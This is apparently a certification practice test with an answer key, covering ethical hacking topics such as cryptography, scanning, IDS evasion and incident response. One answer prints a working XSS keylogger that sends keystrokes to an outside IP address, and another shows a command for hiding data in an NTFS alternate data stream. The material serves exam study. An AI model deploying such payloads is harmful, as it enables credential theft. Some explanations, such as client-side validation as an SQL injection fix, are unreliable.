Ethical Hacking - C701 Kaplan Practice Test 1/2
Which attack vector commonly uses covert channels?
Trojan malware Malware, specifically Trojans, use covert channels for transmission to avoid intrusion detection systems. Covert channels hide processes and other data within another protocol, also called tunneling. Covert channels are unauthorized, while overt channels are legitimate communication paths. Trojans can also use covert channels to modify critical OS files, disable firewalls and antirust software, and create backdoors for remote access.
You are a security analyst evaluating possible threats using Blackberry mobile devices. Which best describes a blackjacking attack?
Using a mobile app to gain access to internal networks A blackjacking attack uses a mobile app to gain access to the internal networks. To allow easy deployment of mobile apps to Blackberry devices, the Blackberry Enterprise Server (BES) has a VPN connection to the corporate network. This allows a mobile app to use that VPN connection to avoid firewalls and access the internal network. You can use the Big Brother message proxy (BBProxy) tool to perform a blackjacking attack by forwarding messages from the BES to other servers in the internal network.
You are hardening the CEO's laptop against boot sector viruses by setting the MBR to read-only and enabling password protection in the system BIOS. The BIOS uses a hashing algorithm similar to LAN Manager to generate a checksum that is stored on the FlashROM. Based on the following checksums, which password is the most secure?
0x0182bd0bd4444bf836077a718ccdf409 The most secure password is the one with the checksum 0x0182bd0bd4444bf836077a718ccdf409, because it is at least 8 characters long. The LM hashing algorithm is currently disabled in modern Windows systems, but is still used by SMB over TCP and via the NetBIOS API. The algorithm truncates or pads out passwords to 14 uppercase characters, divides the result into two 7-byte halves, and used to create two DES keys. Then, each DES key is used to encrypt the constant ASCII string KGS!@#$%, generating two 8-byte sections that are concatenated into a single 16-byte number, represented in hexcode. The other checksums are not secure because their last 8 bytes are aad3b435b51404ee. This value is generated from LM hash padding when the password is less than 8 characters. All other aspects being the same, a password with a longer length is more secure than shorter-length passwords. Also, passwords must be at least eight characters in length to meet minimal security standards.
Why would an attacker work very slowly when performing a ping scan of the network?
Evade detection by the IDS A hack would work very slowly when performing a ping scan of the network to evade detection by the IDS. Alert thresholds can be used to reduce the amount of alerts the IDS has to store. For example, an IDS can be set to only report the first instance of a violation, but not the next 50 instances. If the hacker performs the scan slowly and the IDS has an alert threshold, it may allow the attacker to evade the IDS by not setting off as many alerts in a time period as a typical ping scan would. An IDS typically recognizes a ping scan by the high number of pings in proportion to unique IP addresses in a short period of time.
Which of the following can NOT be prevented by the security and privacy settings on a client's web browser?
Filtering network packets The security and privacy settings on a client's web browser cannot filter network packets. Firewalls can filter malicious content, including cookies and raw network packets based on IP address and/or TCP/UDP ports.
You would like to encrypt a VPN connection at the Data Link layer of the OSI model. Which protocol should you choose?
PPTP Point to Point Tunneling Protocol (PPTP) is a tunneling protocol that operates at the Data Link layer (Layer 2). It uses Microsoft Point to Point Encryption (MPPE) to protect the connection.
What type of encryption does the Syskey utility utilize?
RC4 The Syskey utility uses 128-bit RC4 encryption. This utility encrypts hashed password information in a SAM database in a Windows system. RC2 is another algorithm in the RC family that uses 64 bit encryption. It is not used in Syskey. RC5 is another algorithm in the RC family. It is a 32/64/128-bit block cipher developed in 1994. It is not used in Syskey. RC6 is another algorithm in the RC family. It a 128-bit block cipher based heavily on RC5, and was an AES finalist developed in 1997. It is not used in Syskey
Which of the following uses 160 bits for hashing?
SHA 1 Secure Hash Algorithm 1 (SHA 1) uses 160 bits for hashing. Cryptographic weaknesses were discovered in SHA-1, and the standard was no longer approved for most cryptographic uses after 2010.
Which statement is FALSE with regard to network address translation (NAT)?
Static NAT uses a one-to-many mapping Static NAT maps a single private IP address to a single public IP address, so it is considered a one-to-one mapping. The types of NAT and the mapping model each uses are: Port Address Translation (PAT) - many-to-one Static NAT- one-to-one Dynamic NAT - many-to-many When using IPSec, tunnel mode supports NAT, while transport mode does not. Network Address Translation (NAT) translates internal IP address to external IP address and vice versa. NAT is typically used by firewalls or routers.
You are reviewing a company's backup and recovery procedures. Which of the following practices will increase the likelihood of failure during tape recovery?
Store all tapes in a secured location on site Storing all tapes in a secured location on site will increase the likelihood of failure during tape recovery. Although you should store all tapes in a secured location, you should have a few backup tapes stored off-site in case of a disaster. Performing read-after-write and full verification will decrease the likelihood of failure during tape recovery. Although full verification increases backup time, it reduces the risk of tape failure during recovery.
You need to ensure that malicious packets are prevented from entering your private network. Packets should be evaluated based on the following criteria: Source IP addresses Protocol and port number Which type of security tool will use only these criteria to deny access?
Router ACL A router ACL (access control list) will use the source IP address, protocol, and port number of a packet to deny access. When a router is examining a packet against an access control list, it looks at each rule starting at the top of the rule list. When a match is found, it takes the prescribed action and stops evaluating the packet. For this reason, the order of the rules is very important when you create ACLs on routers.
What is the broadcast address for the subnet 191.43.164.0/22?
191.43.167.255 The broadcast address for 191.43.164.0/22 is 191.43.167.255. This uses the 255.255.252.0 subnet mask. The host address range for this network is 191.43.164.1 - 191.43.167.254. The 191.43.164.255 address is an address that can be used by a host on the network. The 191.43.255.255 address is not part of this address range. The 191.43.165.255 address is an address that can be used by a host on the network.
What is the current recommended RSA key length for a PKI?
2048 bits The CA/B Forum (a consortium of certificate authorities), major browser vendors, and The National Institute of Standards and Technology (NIST) recommend that sub-2048-bit RSA public keys be phased out by the end of 2013. Prior to Dec 13 2013, the recommendation was a key length of 1024 bits. While it is not yet the case, with the increasing computing power available, longer key lengths of 4096 and 8192 bits are inevitable.
Which ISO 27000 standard describes audits and certifications?
27006 The International Organization for Standardization (ISO) standard 27006 describes audits and certifications for security management systems. The ISO 27000 standard series outlines how to best secure a large ISO-compliant organization. ISO 27001 describes how to perform a risk assessment. ISO 27002 describes how to apply security controls after performing the risk assessment described in ISO 27001. ISO 27005 describes how to best manage security risks using an organized and systematic approach.
Your organization implements a network protocol that uses SMB signing. Which attack does this protect against?
A sniffer used to capture password hashes When an organization implements a network protocol that uses SMB signing, it protects against an attacker using a sniffer to capture SMB password hashes and then using those hashes for offline cracking.
Your company has a policy that alternate data streams (ADSs) should be monitored to verify that they do not contain malicious content. Which of the following tools will help you locate ADSs? (Choose all that apply.)
A)streams.exeB)ADS SpyC)SFind streams.exe, ADS Spy, and SFind are all tools that will locate ADSs. ADS Spy will even let you delete the data stored in an ADS. AdsCheck.exe is used to determine if a computer supports ADS or not. But AdsCheck.exe will not locate existing ADSs.
Which of the following does a security audit evaluate?
Adherence of a company to its security policy A security audit evaluates the adherence of a company to its stated security policy. It answers the question. "Does the organization do what it says it will do?" The security policy describes the security controls to protect the organization from inside and outside attacks. It includes clear objectives, goals, rules and regulations, and formal procedures to protect its assets from cyber-attacks, malicious threats, and foreign intelligence.
You have been asked to perform a thorough vulnerability assessment for your company's file server. You must ensure that you complete all of the appropriate steps for the assessment. What is the first step or phase?
Acquisition The first phase of a vulnerability assessment is Acquisition. This is where you acquire all the appropriate documentation. The five phases (or steps) of a vulnerability assessment are: Acquisition Identification Analyzing Evaluation Generating reports
Which of the following constitutes a vulnerability?
Announcement of a security hole in a product When a security issue is identified with a product, it is a vulnerability.
Which two of the following are goals of key escrow agreements?
B)Provide third party access to dataC)Facilitate recovery operations Key escrow agreements are ones in which copies of private keys used to encrypt data are placed in the safekeeping of a third party organization. This allows for the recovery of the keys from the third party in the event the keys are lost or deleted. It also provides a mechanism to grant access to the data to other third parties, such as law enforcement performing investigations.
Which layers of the Fibre Channel stack are replaced with Ethernet when using FCoE? (Choose all that apply.)
D)FC-0E)FC-1 Layers FC-0 and FC-1 are replaced with Ethernet when using FCoE (Fibre Channel over Ethernet). FC-0 defines the physical layer, including connectors and optical and electrical signaling, while FC-1 defines the transmission protocol, include serial encoding/decoding and error controls. Both the FC-0 and FC-1 layers are based upon optical fiber connections, while FCoE uses full-duplex Ethernet connections and transmissions. In Ethernet, the physical and data link layers use digital electric signaling and MAC addressing for transmission.
Which wireless encryption mechanism uses AES?
D)WPA2 Wi-Fi Protected Access 2 (WPA2) uses Advanced Encryption Standard (AES). WPA2 uses Cipher Block Chaining Message Authentication Code Protocol (CCMP) with AES at 128 bits for data confidentiality and Cipher Block Chaining Message Authentication Code (CBC-MAC) for message integrity.
Your company has completed all the appropriate steps to prepare for a potential incident. The next day, a user informs you that the internal Web server is unavailable. When you research the issue, you determine that a Distributed Denial of Service (DDoS) attack has been carried out against the internal Web server. You need to follow the appropriate incident response procedures to recover the internal Web server. What is the first step to perform when an incident has occurred?
Detect and analyze The first step that should be performed when an incident has occurred is detect and analyze. The steps in the incident management process are as follows: Prepare for incident handling and response Detect and analyze Classify and prioritize Notify Contain Investigate Eradicate and recover Perform post-incident activities
You need to determine how attackers can evade an intrusion detection system (IDS). Which of the following best describes session splicing?
Fragmenting the attack payload Session splicing fragments the attack payload so that the IDS must reassemble the packets to detect the attack. Session splicing is also known as IP fragmentation. Encoding the attack payload is an IDS evasion technique known as attack obfuscation. Attack obfuscation bypasses the IDS by not following a recognized signature, but is able to attack the target.
A hacker was recently caught trying to deface the web site of a company with which he had serious disagreement concerning their use of certain chemicals in their products. What is this type of hacker called?
Hacktivist A hacktivist is a hacker who seeks to cause some sort of overall change through his efforts, rather than to cause damage or steal something. A cracker is a hacker who is considered to be skilled and intent on damaging something or stealing something.
Of the listed physical security controls, which is usually only deployed in the data center?
Hot and cold aisles Hot and cold aisles are usually only deployed in the data center. They are a cooling technique where air is circulated in a certain manner to provide optimum cooling in the data center.
Recently, your organization was the victim of a social engineering attack. Security guards allowed a power company repairman into the company to supposedly perform some tests. The repairman actually installed a network sniffer on the network. Which type of social engineering attack occurred?
Impersonation The type of social engineering attack that has occurred is impersonation. Impersonation occurs when any attacker pretends to be a legitimate trusted person to gain access to your facility. This includes posting as a legitimate user, as technical support, as repairmen, or as a trusted authority figure. Eavesdropping is a social engineering attack where attackers listen in on conversations or intercept messages between employees.
Which biometric scan focuses on the colored portion of the user's eye?
Iris An iris scan focuses on the ridges in the iris, which is the colored part of the eye. A retina or retinal scan focuses on the unique patterns of the blood vessels in the back of a user's eye.
Which of the following statements is NOT true about RSA SecurID?
It is a form of mutual authentication While RSA SecureID is a form of two-factor authentication (it requires something you know and something you have), it is not mutual authentication. Mutual authentication requires both ends of a connection request to authenticate one another. RSA SecureID only authenticates the user.
A security engineer runs the following Nmap command: nmap -sn -PE 192.168.1-5 What are the results of this scan?
It will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. The nmap -sn -PE 192.168.1-5 command will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. The -PE switch indicates that Nmap will use standard ICMP echo request/responses, while the -sn switch will disable port scanning.
Which of the following tools is used to obfuscate binary code in an executable so that it is undetectable by anti-virus software?
SwayzCryptor SwayzCryptor is used to obfuscate binary code in an executable so that it is undetectable by anti-virus software. Crypters encrypt binary code in executables to hide malware like viruses, keyloggers, and RATs. SwayzCryptor is a fully undetectable (FUD) crypter that can also bind other files and spoof extensions. Other crypters include Hidden Sight Crypter, Galaxy Crypter, Criogenic Crypter, and Heave Crypter.
Which of the following is true of 3DES?
Symmetric algorithm Triple Data Encryption Standard (3DES) is a symmetric algorithm, which means the keys used to encrypt are the same used to decrypt. It is not a hashing algorithm. It is used to encrypt data. Hashing is used to maintain the integrity of data. It is not a stream cipher. It is a block cipher, which means it encrypts blocks of data, while a stream cipher encrypts on a bit-by-bit basis. It is not considered stronger than AES. AES is generally considered to be the strongest and is required for FIPS compliance
Which attack occurs at the Transport layer of the OSI model?
TCP session hijacking
You need to perform the following tasks: Identify all resources on a target system. Identify the potential threats to each resource on the system. Determine a mitigation strategy to handle serious and likely threats. What is the name of this process?
Vulnerability assessment The name of this process is vulnerability assessment. It is commonly implemented using an automated scanning tool that relies on a database of common vulnerabilities.
Your company provides a user feedback form that includes a comment field. Currently, comment data is received using a <textarea> element without any front-end or back-end validation. Which of the following JavaScript code would be an example of an attempted XSS KeyLogger attack?
document.onkeypress = function(e) { new Image().src = 'http://5.45.64.15/index.php?data=' + encodeURIComponent(e.key);}; The most significant clue that this JavaScript code is a keylogger is the registration for the onkeypress event handler. The keypress event is fired when any key is pressed while the webpage has the focus. When a key is pressed, the function attaches the URI-encoded version of the character and appends it to the attacker's URL. By assigning the URL to an image source, the webpage will silently send the data without requiring the interaction or notification of the web user.
You are identifying system vulnerabilities on a NTFS system. Which of the following command-line statements is an example of alternate data streams (ADS)?
echo bad stuff > good.txt:shh The following command-line statement is an example of alternate data streams (ADS): echo bad stuff > good.txt:shh This command-line statement pushes the echo text (bad stuff) into the good.txt file with an alternate stream named shh, not the default primary stream. This technique allows malicious content to be hidden in a file to avoid detection.
Which of the following versions of the Linux firewall is required for Linux kernel versions 2.4x and above?
iptables The latest version of the Linux firewall, and thus the version required for Linux kernel versions 2.4x and above, is iptables. It replaced the program ipchains, which was the proper version for Linux kernel version 2.2x.
You are working with another security professional to design your company's incident response procedures. Which of the following statements is true?
)Incident response is part of incident handling, and incident handling is part of incident management Incident response is part of incident handling. In turn, incident handling is part of incident management. Incident management includes vulnerability analysis, artifact handling, announcements, alerts, incident handling, and other incident management services. Incident management ensures that there is a process in place to handle incidents. Incident handling includes triage, reporting and detection, analysis, and incident response. When an incident occurs, the incident handling process begins. Actual incident response occurs during the incident handling process.
You are responsible for reviewing the event logs for several servers. Auditing is enabled on all the computers. Recently during a review, you noticed that there is a four-hour gap in the events contained in the security event log for one server. The security event log contains events before and after the four-hour gap. You check the other logs on the same server and do not notice any time gaps. What is most likely the reason for this time gap in the security event log?
)The system was compromised. It is most likely that the system was compromised and the attacker removed data from the security event log. This would prevent you from being able to read the security event logs that occurred during the time in which the system was compromised. The system was running because all the other logs contain events during the time gap. Auditing was enabled because the log contains events both before and after the time gap. If the security event log was full, it would not contain any events after a certain point in time. The scenario specifically stated that the log contains events before and after the time gap.
You are performing a ping sweep to determine the live hosts running in network 204.17.5.0/27. How many possible hosts will be pinged?
30 hosts in 8 subnets There is a possibility that 30 hosts in 8 different subnets will be pinged using network 204.17.5.0/27. In classless inter-domain routing (CIDR) notation, the number after the forward-slash (/27) is the number of bits used in the subnet mask (255.255.255.224), with the remaining bits used to define the hosts, subnetwork, and subnetwork broadcast. This subnet mask would take the Class C address of 254 hosts (if using the default subnet mask of 255.255.255.0) and divide it into 8 subnets as follows: The CIDR notation for 254 hosts in 1 subnet would be 204.17.5.0/24. The default subnet mask for a standard Class C address is 255.255.255.0. The CIDR notation for 126 hosts in 2 subnets would be 204.17.5.0/25. The subnet mask for this address is 255.255.255.128. The CIDR notation for 62 hosts in 4 subnets would be 204.17.5.0/26. The subnet mask for this address is 255.255.255.192. The CIDR notation for 14 hosts in 16 subnets would be 204.17.5.0/28. The subnet mask for this address is 255.255.255.240.
Which port is the most likely to be open on a web server?
80 The authorized port number for HTTP is 80, so it is the most likely to be open on a web server. While it is possible to use another port for HTTP, it is not practical to communicate this fact to all users using a public web server. Therefore, the port must be left open on both the web server and the firewall, creating a ready-made channel to launch an attack. Port 25 is used for Simple Mail Transfer Protocol (SMTP) and is not typically open on the web server. Port 3389 is used for Remote Desktop Protocol (RDP) and is also usually not open in the web server. Port 23 is used for Telnet and is usually not open in the web server. If a command-line connection is required, it will probably use Secure Shell (SSH) on port 22 rather than Telnet, which transmits in clear text.
You are concerned about external hackers gaining control of a new web application. With that threat actor in mind, which of the following tests would be appropriate?
Black box . A black box test, one in which the testers are given no information about the application or its environment, would be appropriate. External hackers would be faced with same lack of information. A gray box test is one in which the testers are given some, but not all, information about the system and its environment. This approach would be appropriate if the concern were with an employee elevating his privileges, as this user would have some knowledge of the application and its environment, although not complete knowledge.
Which of the following would be an appropriate mitigation for tailgating?
Mantrap A mantrap can mitigate tailgating, in which an unauthorized person enters the facility by following an authorized person who has successfully authenticated to the physical access system. A mantrap is a two-door system with a small room between them. This allows each person entering to be visually verified
You are running a penetration test for a small IT service provider during normal operating hours. Which of the following activities is most likely to be restricted in the rules of engagement (ROE)? (Choose all that apply.)
C)Password crackingD)Distributed denial of service Activities like password cracking and distributed denial of service (DDoS) could be deemed too intrusive or detrimental to normal business operations, especially if tests are run during regular business hours. DDoS could be disallowed outright, while password cracking may be limited to prevent exhaustive brute force attacks that could impact system responses. The ROE (rules of engagement) documentation provides an ethical hacker the scope of targets and allowed testing techniques and tools. It also includes specific IP address ranges, testing periods, contact information for the team and affected systems and networks, prevention measures for alerting law enforcement, and how collected information will be handled after testing.
Your software company has recently implemented an IaaS solution with a cloud service provider. Multiple web sites use PKI to provide user account security to your customers. Which component(s) are the responsibility of your company to manage? (Choose all that apply.)
C)Private key E)Digital signature Your company must manage the private key and digital signature in PKI, even when leveraging a cloud service provider for virtual infrastructure. In PKI, the only component that must be stored and managed by a public-facing application or web site is the private key of the public/private key pair associated with the digital certificate. A copy of the private key may also need to be stored by a key escrow for third-party access or recovery. The company can also use the private key to create a digital signature for identity purposes on all communication, encrypted or not.
You are reviewing source code for any buffer overflow vulnerabilities. The following C++ source code handles data extracted from a compressed file: if (extractedDataLength < 65536) {//Break down data into multiple chunks}else {//Handle data in one large chunk} The data should be broken down into multiple chunks only when the buffer of 65,536 characters is reached or exceeded. How should you modify the condition in the first line of the code?
Change to extractedDataLength >= 65536 You should replace the first line with the condition extractedDataLength >= 65536 so that the data is broken down into multiple chunks only if the buffer is reached. The >= operator means "greater than or equal to." You should not replace the first line with the condition extractedDataLength <= 65536 because this condition will break down the data into multiple chunks if is less than or equal to the buffer size. You should not replace the first line with the condition extractedDataLength > 65536 because this condition will break down the data into multiple chunks if the data is greater than the buffer size, but not when the data is equal to the buffer size. You should not replace the first line with the condition extractedDataLength == 65536 because this condition will break down the data into multiple chunks only if it is equal to the buffer size, not when the data is greater than the buffer size.
Which of the following is NOT a threat on a Windows file server because of a missing security patch vulnerability?
Copying sensitive data to a USB drive While the copying of sensitive data to a USB drive is a concern that should be addressed through the control of the use of USB ports, this threat is not because of security patches. Security patches cannot address a setting (like use of USB ports) which must remain under the control of the enterprise. Missing security patches can cause the following to occur: Exposure of sensitive files Improper access to databases Exposure of passwords
Alice frequents coffee shops, libraries, and other public areas where your company's remote employees typically work. Alice knows that the username and password employees use to log in to their laptops are the same credentials used to access the company's virtual private network (VPN). When an employee first arrives and pulls out a laptop, Alice will position herself in a seat behind that employee. When the employee enters the login credentials to unlock the laptop, Alice will look over the employee's shoulder to see the username and which keys are typed for the password. What should the company do to prevent this shoulder surfing attack?
Create and enforce a physical security policy for remote employees. You should create and enforce a physical security policy for remote employees. Next, you should follow through with security awareness training on the new security policy. The security policy should be kept up-to-date, and any updates should be shared with all employees on an ongoing and regular basis.
As a security professional for your company, you must perform routine network analysis. Today you must perform a traffic capture using tcpdump. You run the tcpdump -w /log command. What does this command do?
Creates a binary log file in a specific folder. The tcpdump -w /log command creates a binary log file in a specific folder, in this case /log. The tcpdump -r file_name command will read packets from a particular file. The tcpdump -i int_name command will capture packets from the specified interface. The tcpdump host host_name command will capture packets from the specified host.
You need to perform a thorough audit of your company's infrastructure configuration. The proposed security policy will require detailed vulnerability assessment and compliance with industry-accepted best practices, including SOX and PCI. Enterprise assessments, reporting, and patch management must be centralized. Which tool will BEST meet these requirements?
Ecora Auditor Professional The best tool to meet these requirements is the Ecora Auditor Professional. This vulnerability management system uses a non-agent architecture to discover, collect, analyze, and report configuration data across an enterprise infrastructure. Its features include centralized configuration auditing, change management, compliance policy reporting for standards like SOX, PCI, GLBA, and HIPAA, and IT configuration analysis against industry standards like ITIL, CobiT, NIST, and ISO 1779
You run the following command on a Windows computer: FOR /L %H IN (1 1 10) DO ping -n 1 192.168.1.%H | FIND /I "reply" What is the result?
Enumeration the alive systems in first ten IP addresses in the 192.168.1.0 network via ICMP Running the given command would enumerate the alive systems in the first ten IP addresses in the 192.168.1.0 network via ICMP. The FOR command syntax is as follows: FOR /L %parameter IN (start step end) DO command This FOR command uses the /L switch to specify a list enumeration for the %H parameter, starting at 1, incrementing by 1, and ending at 10 for the last octet of the target IP address in the ping command. The -n switch on the ping command specifies a single packet to send. The pipe operator (|) sends the output, where it is searched by the FIND command for a response.
Which of the following is NOT an advantage to using SOAP?
Faster than the CORBA standard Simple Object Access Protocol (SOAP) is NOT faster than CORBA, because it utilizes a verbose XML format. XML takes longer to parse than binary. SOAP is platform-independent, simplifies communications, and leverages multiple transport protocols. Common Object Request Broker Architecture (CORBA) is a standard defined by the Object Management Group (OMG). It is also designed to facilitate the communication of systems that are deployed on diverse platforms.
You are investigating a Perl script that contains the following code: my $user = $q -> param('username');my $pwd = $q -> param('password');my $sth = $dbh -> prepare("SELECT authcode FROM customersWHERE uname = '$user' & pwd = '$pwd'");$sth->execute(); Which modification(s), if any, should you make to prevent SQL injection attacks?
Filter user input with client-side validation and use parameter placeholders. You should filter user input with client-side validation and use parameter placeholders to prevent SQL injection attacks. Filtering user input based on size and data type can be performed using JavaScript, reducing server-side processing and the possibility of malicious content. Using parameter placeholders, rather than dynamic SQL statements, will ensure that the input is validated before the statement is executed. To implement placeholders in Perl DBI, you would modify the last two lines as follows: my $sth = $dbh -> prepare("SELECT authcode FROM customersWHERE uname = ? & pwd = ?");$sth->execute($user, $pwd); Modification is necessary because the Perl script concatenates the query parameters directly to the SQL statement. This is the textbook case for creating code vulnerable to SQL injection attacks.
Which device uses rule-based access control?
Firewalls Firewalls use rule-based access control. So do routers. This is accomplished by configuring both allow and deny rules on the device. Client and server computers use mandatory or discretionary access controls based on the needs of the company. Switches usually implement mandatory or discretionary access control as well.
Your company has implemented a virtualization solution to isolate software environments and establish access levels for internal employees. Which of the following software are vulnerable to a VM-level attack? (Choose all that apply.)
Hyper-V ESXi Both ESXi and Hyper-V are hypervisors that could be the target of VM-level attacks. A hypervisor is software that manages virtual machines on a host machine by providing the bridge between the hardware and the guest operating systems. ESX/ESXi is a popular native hypervisor for the VMware platform, while Hyper-V is offered by Microsoft. In a VM-level attack, the hacker targets a known vulnerability in the hypervisor software and could gain unauthorized access to hardware and guest operating systems, even if those virtualized operating systems are hardened.
As an ethical hacker, you are using Nmap port scanning and must try to evade a certain type of device. You are using the following techniques: Break the network scans up into smaller ranges, with delays in between each scan. Break up IP packets into fragments. Which type of device are you most likely attempting to evade?
IDS You are most likely attempting to evade in intrusion detection system (IDS). IDSs can often detect when an attacker is using Nmap port scan. These techniques are intended to evade IDSs, so that they are unaware of potential attackers.
You perform a ping and receive the following results: Pinging 192.168.10.1 with 32 bytes of data:Reply from 192.168.10.1: bytes=32 time=5ms TTL=60Reply from 192.168.10.1: bytes=32 time=1ms TTL=60Reply from 192.168.10.1: bytes=32 time=1ms TTL=60Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 During a routine ping test later in the week, you receive a reply packet from the IP address 192.168.10.1, but the TTL value is now 40. What is the most likely reason for this discrepancy?
IP spoofing The most likely reason for the discrepancy in the TTL values is IP spoofing. The initial TTL (time to live) value differs by protocol, but common values like 64, 128 and 255 are used. Normally, the TTL of the reply packet should start at the same initial value as the request packet's TTL. So, the difference between the two TTL values should be the hop count. One way of detecting IP spoofing is to verify that the TTL of the reply packet matches the request TTL minus the hop count. This is not a perfect detection, because TTLs can vary based on traffic patterns, especially if going across the internet.
During a risk assessment, which of the following roles is responsible for providing the security architecture to the risk assessor?
IT security analyst The IT security analyst (sometimes also referred to as a system owner) will provide a description of the security architecture to the risk assessor. Of the available choices, the IT security analyst would be in the best position to speak to the relative strengths and weakness of a systems security architecture. The chief information officer (CIO) is in charge of planning and budgeting for the information systems and is not typically close enough to the identify strengths and vulnerabilities of individual systems or of the overall architecture the systems create to provide an analysis of the security architecture to the risk assessor. The business manager or functional manager is in charge of ensuring systems and information assets for a unit are used to accomplish business objectives. The business manager typically has neither the technical insight nor the access to the system required to provide an analysis of the security architecture to the risk assessor. The facilities manager can speak to physical risks to the facility but has neither the technical insight nor the access to the system required to provide an analysis of the security architecture to the risk assessor
Your IT security team defends against privilege escalation with the following countermeasures: Encryption for sensitive company data Services run as unprivileged accounts Multi-factor authentication and authorization Which additional countermeasure would BEST enhance the current defense?
Limit interactive logon privileges To best enhance the defense against privilege escalation, you should limit interactive logon privileges. Restricting users to the least amount of required privileges required to effectively do their job will prevent an attacker from gaining administrative access from a low-level account.
A systems administrator reports to you that an attacker used a TOR proxy to carry out an attack against your network. What does this proxy provide to the attacker?
Location anonymity A TOR (The Onion Routing) proxy can be used by an attacker to provide location anonymity. This is because packets are routed through many different proxy servers. So when tracing the path of the packet, you will simply locate another proxy server when tracing each source in the traffic chain. A TOR proxy does not provide packet fragmentation, overlapping fragments, or payload obscurity. Packet fragmentation occurs when the attack payload is split into multiple small packets. Overlapping fragments occur when an attacker crafts a series of packets with TCP sequence numbers that overlap. Payload obscurity occurs when the attack is encoded so that the target computer will reverse the encoding, but the IDS will not detect it, thereby allowing the encoded payload to pass.
Jim is working all night as the security administrator. He makes note of some unusual network activity at about 3 AM. Based on the unusual activity, Jim suspects an attack is underway, but he has no other evidence. How should Jim react to the situation?
Log what has occurred, consult the security policy, and act accordingly The purpose of a detailed security policy is to provide guidance to individuals in just such a situation. It should be the first item consulted whenever a technician is presented with a situation in which he is not quite sure how to act, and it should attempt to anticipate as many scenarios as possible. He should not immediately call the incident response team UNLESS that is what is called for in the security policy. He should not simply log what has occurred and continue administrative duties. He should consult the security policy and act accordingly. That may mean he should log the event and move on, but only after confirming this is the specified action to take.
You have been hired as an ethical hacker by a company. During your initial meeting, you are given several guidelines that must be complied with by the company's security, including HIPAA. Which type of company has MOST likely hired you?
Medical You are most likely working for a medical company. Health Insurance Portability and Accountability Act (HIPAA) affects any companies that may be dealing with medical records. None of the other company types is likely because HIPAA is involved. Ethical hackers must be familiar with any laws, regulations, or standards that affect the industries for which they work. In addition to HIPAA, these include: Payment Card Industry Data Security Standard (PCI-DSS) - affects any organizations that handle credit cardholder information. ISO/IEC 27001:2013 - provides guidelines on information security management systems for all types of organizations. Sarbanes Oxley (SOX) Act - provides guidelines for financial reporting for any publicly traded company. Digital Millennium Copyright Act (DMCA) - provides copyright protections for intellectual property. Federal Information Security Management Act (FISMA) - provides information security control guidelines for federal organizations and agencies.
Which of the following statements BEST describes disgruntled employees?
Most serious threat the organization faces Disgruntled employees pose the most serious threat to the organization. This is because they have already have scanned, enumerated, and gained access to the network. They can now continue to the later steps of the hacking methodology to escalate privileges and execute applications.
Your company has a monthly requirement to test corporate compliance with host application usage and security policies. You need to use the appropriate tool to fulfill this requirement.
Nessus You should use a vulnerability scanner like Nessus to test corporate compliance with host application usage and security policies. This tool is used to examine your network for any vulnerabilities. A network sniffer like Wireshark is used to capture packets that are on your network.
Which of the following action does vulnerability scanning NOT perform?
Notifies of threats based on active attack signatures A vulnerability scanner does not notify of threats based on active attack signatures. This is the role of an intrusion detection system (IDS). Vulnerability scanners, like Nessus, utilize automated processes to gather information on single systems or the entire network, such as open ports and running services, application and services configuration errors, applications, services, and other network vulnerabilities. They can also operate proactively to locate issues when they occur.
You are a network security analyst for your company. You perform the following scan from a remote machine: nmap -sX 141.8.225.72 You use WireShark to capture the response packets. How do you determine which ports are open?
On Linux/Unix machines, there is no response. On Linux/Unix machines, there is no response. This Nmap scan uses the -sX switch, which is a Xmas scan. A Xmas scan sets at least the FIN, URG and PUSH flags on the TCP frame. Because their implementation of the TCP/IP stack conforms strictly with RFC 793, Linux/Unix machines will send no response if a port is open, but will send a RST response if the port is closed. On Windows machines, there is no response from both open and closed ports. Xmas scans are only intended for Linux/Unix machines that are compliant with RFC 793.
Joe, who does not work for your company, was able to steal an employee badge from a car in the parking lot and use it to enter the facility. What type of threat does Joe present?
Outside affiliate Joe would be considered an outsider affiliate threat. Insider threats can be organized into four categories as described in the list below: Pure insider - an employee with all the rights and access associated with being employed by the company. Insider affiliate - a spouse, friend, or even client of an employee who uses the employee's credentials to gain access. Outside affiliate - non-trusted outsiders who use open access to gain access to an organization's resources. A great example of this is an outsider gaining unauthorized access to wireless access points. Insider associate - someone with limited authorized access. Contractors, guards, and cleaning and plant services all fit under this category.
You need to send an encrypted message to another user. Both you and the recipient have private and public keys. As the sender, you must obtain the recipient's public key to send the message. Which cryptographic technology are you most likely using?
PGP PGP (Pretty Good Privacy) is most likely the cryptographic technology being used. The OpenPGP standard involves the use of digital certificates, compression, and private and public keys to reduce the sniffing threats. Private key encryption is often referred to as symmetric encryption, and public key encryption is often referred to as asymmetric encryption.
You are an ethical hacker. You recently gained consent from an online healthcare service company to begin a series of penetration tests. These tests should only be performed during off-peak hours on Saturday and Sunday, so as not to greatly affect existing patients. You identify a SQL injection vulnerability in the account logon form. Which of the following actions would most likely NOT violate your professional code of conduct?
Perform a Boolean-based blind SQL injection attack, and include the results in the audit report. Performing a Boolean-based blind SQL injection attack and including the result in the audit report will most likely NOT violate your professional code of conduct. This is because existing customers are less likely to be impacted by this action and less confidential information is being recorded in the audit report. An ethical hacker should always consult with the rules of engagement (ROE) before proceeding with any activities however. The ROE is guideline documentation for performing the penetration test, including allowed activities like port scanning, social engineering, and network sniffing, and restricted activities like password cracking and SQL injection attacks. It is possible in this scenario that even performing a SQL injection attack is forbidden. Even if it is not, going beyond the initial testing may go beyond agreed-upon limits.
You are heading a committee that is responsible for creating your company's security policies. What should you do FIRST?
Perform a risk assessment When creating your company's security policies, you should first perform a risk assessment. This involves identifying the risks that your company and network faces and then prioritizing these risks. You should identify the assets as part of risk assessment. The steps for creating security policies are as follows: Perform a risk assessment. Collect standard guidelines to use as guides. Include senior management in the policy development. Set clear penalties and enforce them. Make the final version of the policies available to staff. Ensure that every staff member reads, signs, and understands the policies. Deploy tools to enforce the policies. Train and educate users about the policies. Review and update the policies on a regular basis.
Your company has deployed a signature-based anti-virus application on all of its computers. You are concerned that there will be new viruses created that the application cannot detect. Which of the following virus types is most likely to evade detection by the anti-virus application?
Polymorphic virus A polymorphic virus is most likely to evade detection by a signature-based anti-virus application. This virus type changes its code every time it infects a system.
Which of the following is NOT a limitation of a signature-based network intrusion detection system (NIDS)?
